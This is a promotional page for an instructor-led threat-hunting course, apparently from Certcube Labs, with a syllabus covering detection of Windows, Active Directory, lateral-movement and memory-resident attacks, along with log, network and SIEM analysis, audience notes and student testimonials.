Advanced threat hunting professional
Advanced Threat Hunting professional training will prepare your mindset for overall threat identification and hunting capabilities . No matter which side you are either blue, red, or purple, a decent understanding of Threat investigation and Threat Intelligence is vital if you want to be a complete IT Security Expert. You cannot be a professional defender without enough knowledge of attacking techniques. The same goes for penetration testers too. The Advanced Threat Hunting professional course is designed to upgrade IT security specialists with the abilities necessary to hunt for threats proactively and become an advance threat hunter.
In This training we will solve an APT real world attack case and its complete detection with multiple phases of threat hunting .
Advanced Threat Hunting Professional Training is for you if
- You’ve ever sat at a screen feeling paralyzed by not knowing what to look for next.
- You’ve always wanted to find evil on your network without alerts, but don’t know how to approach it.
- You struggle to dissect attacks and derive hunting strategies from them.
- You have a mountain of data at your disposal but don’t know which techniques are best suited for gaining the necessary perspective over it to spot anomalies.
- You want to add threat hunting capabilities to your security team but don’t know how to get buy-in from management or prove just how valuable it can be.
- How to approach the threats as per APT timeline
who should attend this training?
- Security Operations Center analysts and engineers
- Incident response team members
- Penetration testers/Red team members
- Network security engineers
- Information security consultants and IT auditors
why should i take this training?
The Advance Threat Hunting Training course is designed to provide IT security
professionals with the skills necessary not only to proactively hunt for threats, but
also to become a stealthier penetration tester
prerequisite of the training ?
- A solid understanding of computer networks: switches, routing, security
devices, common network protocols, etc. (Recommended)
- Intermediate understanding of IT security matters
What is the duration of the training ?
Its an Instructor-led online training and the total duration of the training is 45 hours.
Threat hunting essentials
- The process of Investigation
- Where threat hunting Fits in and Defined
- Incident Response & Threat Hunting relationship
- Threat Hunting Teams
- Tactics, Techniques, and Procedures
- Cyber Kill Chain Model
- Diamond Model
- Understanding TTP with MITRE ATT&CK
- Align MITRE ATT&CK tactics to collect threat intel about the adversaries .
- Sophisticated APT case – An enterprise attack-based scenario for this training
Mapping Windows INSECURITIES
- Advanced Persistent Threats
- how to identify Compromised machines
- Finding persistent Malware beacons
- Sophisticated malwares analogy – LOLBAS
- Identifying and Understanding the system attacks –
- AutoStart Locations, RunKeys
- Service Creation/Replacement
- Service Failure Recovery
- Scheduled Tasks
- DLL Hijacking Attacks
- PowerShell events
- PowerShell Remoting basics
- Kansa for PowerShell based investigations
PRACTICAL WINDOWS ENUMERATION
- Identifying and Understanding the Active directory attacks –
- Pass the Hash
- Credential Attacks with Mimikatz
- Token Stealing
- Cached Credentials
- LSA Secrets
- Kerberos Attacks
- Golden Tickets
- NTDS.DIT theft
- Bloodhound analysis
- Common dumping tools
- Common Hiding and Persistence Mechanisms
Lateral movement attacks detection
- Compromising Credentials Techniques
- Remote Desktop Services Misuse
- Windows Admin Share Abuse
- PsExec and Cobalt Strike Beacon PsExec Activity
- Windows Remote Management Tool Techniques
- PowerShell Remoting/WMIC Hacking
- Cobalt Strike Lateral Movement and Credential Use
- Software Vulnerability Exploitation detections
- Command-Line Analysis and WMI Activity Logging
- PowerShell Transcript and Script Block Logging
- Discovering Cobalt Strike beacon PowerShell Import Activity
- Detecting PowerShell Injection from Cobalt Strike, Metasploit, and Empire
- PowerShell Script Obfuscation
Live examination of compromised machines
- Infected Environment isolation
- Malware Persistence Detection and Analysis
- Scaling Data Collection and Analysis Across the Enterprises
- Finding and Analyzing Malicious WMI attacks
- Live memory acquisition
- Acquisition from multiple sites
- Shimcache and Amcache anatomy for threat hunters
- Shellbags for Threat hunters
- Ntuser.dat and Usrclass.dat for threat hunting
- MFT and MRU for threat hunters
- APT hunting in memory in depth
- APT case mind map with live exmination
- Memory Forensics Analysis Process for threat Hunting
- Understanding Common Windows Services and Processes
- Identify Rogue Processes
- Analyze Process DLLs and Handles
- Review Network Artifacts
- Look for Evidence of Code Injection
- Check for Signs of a Rootkit
- Acquire Suspicious Processes and Drivers
- Advanced Memory Analysis with Volatility
- Webshell Detection Via Process Tree Analysis
- Code Injection, Malware, and Rootkit Hunting in Memory
- WMI and PowerShell Process intrusions
- Extract Memory-Resident Adversary Command Lines
- Investigate Windows Services
- Hunting Malware Using Comparison Baseline Systems
- Find and Dump Cached Files from RAM
Log analysis primer
Log Analysis for Incident Responders and Hunters
- Profiling Account Usage and Logons
- Tracking and Hunting Lateral Movement
- Identifying Suspicious Services
- Detecting Rogue Application Installation
- Finding Malware Execution and Process Tracking
- Capturing Command Lines and Scripts
- Anti-Forensics and Event Log Clearing
Network threat hunting
- ARP traffic Investigation
- ICMP traffic hunting
- TCP and UDP wide analysis
- DHCP and DNS examine
- HTTP and HTTPS traffic suspects
- hunting Internal Corporate Threats
- Investigating Network attacks & correlating Forensics evidences
- RSA Net Witness Investigator for threat hunters
- Investigating network traffic with Security Onion and ELK.
- Investigating network traffic with OSQuery
SIEM for threat hunters
- SPLUNK 101 for threat hunters
- ELK 101 for threat hunters
- Volume shadow snapshot analysis
- Timelines incorporating volume shadow snapshot data
- Anti-Forensics analysis using NTFS filesystem components
- Timestomping identification and suspicious file detections
- Advanced data recovery with records carving and deleted volume shadow copy recovery
What People Are Saying
Today I've completed my one 2 one online training by Mr Naresh sir from Certcube Labs .
This is the first time I have attended a class in this format and wondered how effective it would be. It was very effective and therefore I would definitely be interested in attending other classes in the same format. The instructor was very knowlegeable and provided a wealth of information about the current version, especially since the last version I used was several releases ago.
5 start training. Naresh is the best. He made me Zero to Hero in 3 months time. Little bit expensive compare to others ,but totally worth it .
We're Here To Help!
3500 , 1st Floor , Raja Park , New Delhi -110034
M-S: 10am - 11pm